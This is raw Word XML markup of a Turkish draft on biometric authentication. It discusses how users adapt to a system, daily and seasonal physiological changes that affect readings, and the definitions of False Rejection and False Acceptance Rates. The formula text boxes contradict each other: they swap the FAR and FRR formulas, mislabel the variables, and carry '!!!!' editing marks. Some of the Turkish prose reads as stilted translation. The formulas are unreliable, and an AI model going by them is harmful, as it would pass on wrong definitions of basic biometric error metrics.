hatalardan kaynaklanmamaktadır. Sistemlerin kullanıcıları, biyometrik sistemlerin karşılaştığı sorunların çoğuna neden olur. İnsanlar yeni ve farklı durumlara kolayca adapte olabiliyorlar ve yeni davranış modlarını makinelerden çok daha kolay öğrenebiliyorlar. Bir biyometrik sistemin bu değişimi nasıl ele aldığı genel etkinliğinde önemli bir rol oynayacakt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rneğin, bir biyometrik sistem ilk kez devreye alındığında, kullanıcılar karakteristiklerini sisteme nasıl doğru bir şekilde sunacaklarından emin olmayabilirler. Doğru bir göz taraması yapabilmek için kafalarını nasıl tutmalılar? Parmaklarını okuyucuya nasıl yerleştiriyorlar, böylece doğru bir parmak izi okuması alınabiliyor mu? Sistemdeki bu ilk deneyimsizlik (ve olası rahatsızlık), kullanıcı popülâsyonu arasındaki sıkıntı ile birlikte çok sayıda yanlış okumaya yol açabilir. Kullanıcılar tarafındaki doğal tepki, sistemi daha da zorlaştıran kullanıcı olduğunda, yanlışlıklar için sistemi suçlamak olacaktı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Zaman geçtikçe ve kullanıcılar sisteme daha aşina hale geldikçe, bilgilerini daha doğru ölçümlere yol açacak şekilde sunmaları şart koşulacak. Bu şartlandırma, ölçüm için kendilerini nasıl sunacaklarını öğrenirken doğal ve bilinçaltı olarak gerçekleşecektir. Aslında, kullanıcılar sistem tarafından nasıl okunacağını öğrenirler. Bu, sistemin verim oranını hızlandırma ve daha az yanlış okumaya neden olma etkisine sahipt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Kullanıcı davranışı ve fizyoloji de süreçte bir rol oynamaktadır. İnsanlar günleri, haftaları ve ayları boyunca ilerledikçe, fizyoloji ve psikolojilerinde düzenli döngüleri yaşarlar. Bazı insanlar günün erken saatlerinde daha uyanık ve dikkatlidir ve gün ilerledikçe görünür yorgunluk belirtileri gösterir. Diğerleri, öğle saatlerine ve hatta akşama kadar fiziksel doruklarına ulaşmıyor. Mevsimsel </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>değişiklikler bazı insanlarda fizyolojik değişikliklere neden olmaktadır ve yapılan araştırmalar, kış aylarında kısa günlerden dolayı birçok insanın depresyonda olduğunu göstermiştir. Yorgunluk veya stres aynı zamanda bir kişinin fizyolojik yapısını da değiştirebilir. Bu döngüsel değişiklikler, gerçekleşebilecek herhangi bir biyometrik okumayı potansiyel olarak etkileyebil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r işlemin önemi ayrıca kullanıcı davranışını ve biyometrik okumaların yapılmasına yönelik tutumunu da etkiler. İnsanlar daha önemli, kritik, hassas veya değerli işlemler için biyometrik örneklemeye katılmaya çok isteklidir. Teknik olmayan örnekler bile bunun doğru olduğunu gösteriyor. Ortalama bir insan daha fazla zaman alacaktır ve 10 dolarlık çekten 100.000 dolarlık bir çek imzalamaya özen gösterecektir.</w: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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="TrumpMediaeval-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hata Oranları (Error Rates)</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Herhangi bir biyometrik sistemde, sistemin genel doğruluğunu etkileyen istatistiksel hata oranları vardır. Yanlış Reddetme Oranı (FRR- False Rejection Rate), meşru sistem kullanıcılarının reddedilme ve geçersiz kullanıcılar olarak kategorize edilme oranıdır. Yanlış reddetme, Tip I Hatası veya Yanlış Negatif olarak da bilinir(Type I Error , False Negative). Yanlış Reddetme Oranı hesaplaması için genel formül:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CF1AFF6" wp14:editId="2EF8312E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>187325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5743575" cy="2162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5743575" cy="2162175"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="0043671D">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>False Rejection Rate = NFR/NEIA (</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>tanımlama sistemleri için</w:t>
                            </w:r>
                            <w:r w:rsidRPr="0043671D">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Or</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0"/>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="0043671D">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>False Acceptance Rate = NFR/NEVA (</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>kimlik doğrulama sistemleri için</w:t>
                            </w:r>
                            <w:r w:rsidRPr="0043671D">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where:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0"/>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pP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NFR = Number of false rejections</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> (</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00584B9B">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>Yanlış reddetme sayısı</w:t>
                            </w:r>
                            <w:r>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NEIA = Number of enrollee identification attempts</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> (</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00584B9B">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>Kayıtlı kişi tespiti girişimi sayısı</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="0043671D">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>NEVA = Number of enrollee verification attempts</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> (</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00584B9B">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>Kayıtlı doğrulama girişimlerinin sayısı</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regula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AFF6" id="Metin Kutusu 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:401.05pt;margin-top:14.75pt;width:452.25pt;height:17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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0043671D">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>False Rejection Rate = NFR/NEIA (</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>tanımlama sistemleri için</w:t>
                      </w:r>
                      <w:r w:rsidRPr="0043671D">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Or</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0043671D">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>False Acceptance Rate = NFR/NEVA (</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>kimlik doğrulama sistemleri için</w:t>
                      </w:r>
                      <w:r w:rsidRPr="0043671D">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where:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pP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NFR = Number of false rejections</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> (</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00584B9B">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>Yanlış reddetme sayısı</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0043671D">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>NEIA = Number of enrollee identification attempts</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> (</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00584B9B">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>Kayıtlı kişi tespiti girişimi sayısı</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="0043671D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0043671D">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>NEVA = Number of enrollee verification attempts</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> (</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00584B9B">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>Kayıtlı doğrulama girişimlerinin sayısı</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>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jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Minion-Italic" w:hAnsi="Minion-Italic" w:cs="Minion-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yanlış Kabul Oranı (FAR-False Acceptance Rate), gayri meşru olmayan kullanıcıların sistem tarafından yasal olarak kabul edildiği ve geçerli kullanıcılar olarak sınıflandırıldığı orandır. Yanlış kabul, aynı zamanda Tip II Hatası veya Yanlış Olumlu (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="Minion-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Type II Error </w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="Minion-Regular"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or a</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cs="Minion-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> False Positive</w:t>
      </w:r>
      <w:r w:rsidRPr="008D0E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) olarak da bilinir. Yanlış Kabul Oranını hesaplamanın genel formülü şudur:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="225"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008D0E9A" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="225"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E9A">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02839020" wp14:editId="0C3CCA02">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>43181</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5734050" cy="219075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5734050" cy="2190750"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>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Fa</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>lse Acceptance Rate = NFR/NEVA  (</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002C77AB">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>kimlik doğrulama sistemleri için</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>)!!!!!!!!</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Or</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False Rejection Rate = NFA/NIVA (kimlik doğrulama sistemleri için)</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> !!!!!!!</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where:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:autoSpaceDE w:val="0"/>
                              <w:autoSpaceDN w:val="0"/>
                              <w:adjustRightInd w:val="0"/>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB"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NFA = Number of false acceptances</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> (</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002C77AB">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>Yanlış kabullerin sayısı</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB"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NEIA = Number of imposter identification attempts</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> (Sahtekâ</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002C77AB">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>r tanıma girişimi sayısı</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002C77AB">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>NEVA = Number of imposter verification attempts</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> (</w:t>
                            </w:r>
                            <w:r w:rsidRPr="002C77AB">
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regular"/>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="24"/>
                              </w:rPr>
                              <w:t>Sahtekâr doğrulama girişimleri sayısı</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:cs="Minion-Regula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9020" id="Metin Kutusu 3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:400.3pt;margin-top:3.4pt;width:451.5pt;height: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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>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Fa</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>lse Acceptance Rate = NFR/NEVA  (</w:t>
                      </w:r>
                      <w:r w:rsidRPr="002C77AB">
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>kimlik doğrulama sistemleri için</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t>)!!!!!!!!</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Or</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False Rejection Rate = NFA/NIVA (kimlik doğrulama sistemleri için)</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> !!!!!!!</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
                        <w:autoSpaceDE w:val="0"/>
                        <w:autoSpaceDN w:val="0"/>
                        <w:adjustRightInd w:val="0"/>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:rPr>
                          <w:rFonts w:cs="Minion-Regular"/>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="00E77DF4"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where:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00E77DF4" w:rsidRPr="002C77AB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
                      <w:pPr>
